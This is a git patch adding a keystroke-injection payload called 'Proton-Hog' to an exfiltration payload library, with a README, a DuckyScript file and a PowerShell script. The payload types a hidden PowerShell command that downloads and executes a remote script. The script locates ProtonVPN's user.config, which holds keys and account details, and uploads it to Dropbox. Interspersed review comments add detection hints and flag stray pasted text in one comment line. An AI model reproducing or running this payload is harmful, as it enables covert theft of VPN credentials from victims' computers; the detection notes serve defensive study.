From b1ebbcf21965e1c3d9db207ef0e78b46c58a1d9c Mon Sep 17 00:00:00 2001
From: atomic <75549184+atomiczsec@users.noreply.github.com>
Date: Wed, 7 Dec 2022 20:58:51 -0500
Subject: [PATCH] Add files via upload
---
.../library/exfiltration/Proton-Hog/README.md | 108 ++++++++++++++++++
.../exfiltration/Proton-Hog/payload.txt | 19 +++
.../library/exfiltration/Proton-Hog/s.ps1 | 41 +++++++
3 files changed, 168 insertions(+)
create mode 100644 payloads/library/exfiltration/Proton-Hog/README.md
create mode 100644 payloads/library/exfiltration/Proton-Hog/payload.txt
create mode 100644 payloads/library/exfiltration/Proton-Hog/s.ps1
diff --git a/payloads/library/exfiltration/Proton-Hog/README.md b/payloads/library/exfiltration/Proton-Hog/README.md
new file mode 100644
index 0000000..6f2f2d1
--- /dev/null
+++ b/payloads/library/exfiltration/Proton-Hog/README.md
@@ -0,0 +1,108 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Proton-Hog
+
+A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+
+## Description
+
+This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file
+
+Then dropbox will be used to exfiltrate the files to cloud storage
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+📱 My Socials 📱
+
+
+
+
+
+
+
+ YouTube
+ |
+
+
+
+
+ Twitter
+ |
+
+
+
+
+ I-Am-Jakoby's Discord
+ |
+
+
+
+
+(back to top)
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+(back to top)
diff --git a/payloads/library/exfiltration/Proton-Hog/payload.txt b/payloads/library/exfiltration/Proton-Hog/payload.txt
new file mode 100644
index 0000000..a19172d
--- /dev/null
+++ b/payloads/library/exfiltration/Proton-Hog/payload.txt
@@ -0,0 +1,19 @@
+REM Title: Proton-Hog
+
+REM Author: atomiczsec
+
+REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information.
+
+
+REM Target: Windows 10
+
+DEFINE TARGET_URL example.com
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr TARGET_URL dl=1; iex $pl
+ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download in the DEFINE constant
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
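Review bot: The REM header states the goal but not the footprint these keystrokes leave on the host, which is what a defender reading this library needs. A line under `REM Target` such as `REM Detection: Run-dialog launch of powershell with -w h -NoP -NonI -ep Bypass followed by iwr piped into iex` would document it. The command is recorded in the user's RunMRU registry key, in process command-line auditing, and in PowerShell script block logging (event 4104) where enabled. Separately, the final REM line ends with the stray text `mode con:cols=14 lines=1` fused onto the sentence; it looks like paste residue and should be dropped from the comment.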
diff --git a/payloads/library/exfiltration/Proton-Hog/s.ps1 b/payloads/library/exfiltration/Proton-Hog/s.ps1
new file mode 100644
index 0000000..ff568d7
--- /dev/null
+++ b/payloads/library/exfiltration/Proton-Hog/s.ps1
@@ -0,0 +1,41 @@
+function DropBox-Upload {
+
+ [CmdletBinding()]
+ param (
+
+ [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+ [Alias("f")]
+ [string]$SourceFilePath
+ )
+ $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token
+ $outputFile = Split-Path $SourceFilePath -leaf
+ $TargetFilePath="/$outputFile"
+ $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+ $authorization = "Bearer " + $DropBoxAccessToken
+ $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+ $headers.Add("Authorization", $authorization)
+ $headers.Add("Dropbox-API-Arg", $arg)
+ $headers.Add("Content-Type", 'application/octet-stream')
+ Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+ }
+
+# Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored
+
+if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) {
+ try {
+ Write-Host "The VPN folder has not been found. "
+ }
+ catch {
+ throw $_.Exception.Message
+ }
+ }
+
+ else {
+$protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN"
+cd $protonVpnPath
+Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd
+Get-ChildItem | cd
+
+# Upload user.config to dropbox
+DropBox-Upload -f "user.config"
+}
\ No newline at end of file
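Review bot: The script has no header stating what leaves the host; the only comments describe directory navigation. A comment block above `DropBox-Upload` should say that `user.config` found under `$env:USERPROFILE\AppData\Local\ProtonVPN` is POSTed to `https://content.dropboxapi.com/2/files/upload` with a bearer token. The observable signals in these lines are a PowerShell process reading a VPN client's `user.config` and then uploading to content.dropboxapi.com, so alerting on that API host from script interpreters, plus file-access auditing on the ProtonVPN profile directory, covers both steps. Because `$DropBoxAccessToken` is assigned in the script body, it should appear in script block logs where those are enabled, which lets responders identify the destination account and report the token. The `try`/`catch` around `Write-Host` in the not-found branch is unlikely ever to fire and could be reduced to the message line alone.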